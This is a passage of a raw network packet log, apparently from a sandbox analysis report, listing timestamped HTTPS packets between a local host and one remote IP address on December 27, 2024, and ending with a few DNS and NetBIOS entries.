                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194675922 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194680929 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194716930 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194773912 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194802999 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194843054 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194874048 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194919109 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194926977 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194941998 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.194972038 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.239329100 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.276473999 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.276637077 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.276657104 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.276670933 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.276782036 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.276807070 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.323327065 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.516880035 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.517033100 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.517071962 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.517082930 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.517199039 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.517226934 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.517816067 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.517863035 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.517971992 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795105934 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795111895 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795133114 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795145035 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795161009 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795195103 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795213938 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795223951 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795233011 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795245886 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795281887 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795289993 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795305014 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795342922 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795355082 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795383930 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795389891 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795424938 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795433044 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795469046 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795471907 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795485020 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795492887 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795504093 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795511007 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795547962 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795574903 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795588970 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795617104 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795640945 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795653105 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795660019 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795669079 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795669079 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795702934 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795722961 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795736074 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795741081 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795752048 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795780897 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795785904 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795834064 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795867920 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.795896053 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.839356899 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.911895990 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912050009 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912085056 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912092924 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912208080 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912235022 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912235022 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912265062 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912369013 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912426949 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912426949 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912445068 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912503004 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912503004 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912553072 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912553072 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912597895 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912605047 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912612915 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912627935 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912645102 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912678003 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912720919 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912720919 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912754059 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912759066 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912770987 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912797928 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912807941 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912838936 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912839890 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912882090 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912892103 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912899017 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912920952 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912961006 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912961006 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912991047 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.912996054 CET44349796188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:12.913032055 CET49796443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.185336113 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.185383081 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:31.185398102 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.258573055 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.258652925 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.258682013 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.258740902 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259134054 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259212971 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259774923 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259784937 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.259968996 CET49846443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.260006905 CET44349846188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.261531115 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.261535883 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.261574984 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.261585951 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697452068 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697479010 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697650909 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697767019 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:32.697783947 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.433552980 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.433646917 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.433866024 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.434853077 CET49849443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.434865952 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171081066 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171149969 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171222925 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171525955 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171542883 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.188317060 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.188399076 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.190776110 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.190783024 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.192570925 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.192575932 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.192620039 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.192626953 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.237127066 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.237215996 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.237221003 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.237267971 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.238149881 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.238167048 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.617619038 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.617698908 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.618155956 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.618163109 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.619929075 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.619935036 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.620001078 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.620013952 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197264910 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197324991 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197412014 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197640896 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197669983 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.746493101 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.746563911 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.746575117 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.746737957 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.747461081 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.747476101 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206345081 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206391096 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206495047 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206712961 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206726074 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.645689011 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.645761013 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.646234035 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.646266937 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.648186922 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.648200035 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.648262978 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.648302078 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.677073002 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.677160978 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.677642107 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.677648067 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.679421902 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.679426908 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.679441929 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.950746059 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.951066017 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.951072931 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.951569080 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.951586962 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.952894926 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.952899933 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.952940941 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.952945948 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.509907961 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.509965897 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.510039091 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.510220051 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.510243893 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056410074 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056468964 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056478977 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056492090 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056515932 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056535959 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.057401896 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.057416916 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.103027105 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.103108883 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.103687048 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.103691101 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.105478048 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.105482101 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.994230986 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.994303942 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.994410992 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.995235920 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.995245934 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.635507107 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.635528088 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.635598898 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.646568060 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.646580935 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.135283947 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.135416985 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.135879993 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.135890007 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.137491941 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.137496948 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040405035 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040463924 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040710926 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040807009 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040822983 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042090893 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042144060 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042215109 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042594910 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042617083 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.489475965 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.489556074 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.490003109 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.490017891 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.491642952 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.491657019 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.554795980 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.554872990 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.554944038 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.555216074 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.555229902 CET44349915188.245.216.205192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 07:09:10.876012087 CET | 63628 | 53 | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 07:09:11.094137907 CET | 53 | 63628 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 07:09:18.713890076 CET | 138 | 138 | 192.168.2.4 | 192.168.2.255
Dec 27, 2024 07:09:25.600939989 CET | 49418 | 53 | 192.168.2.4 | 1.1.1.1
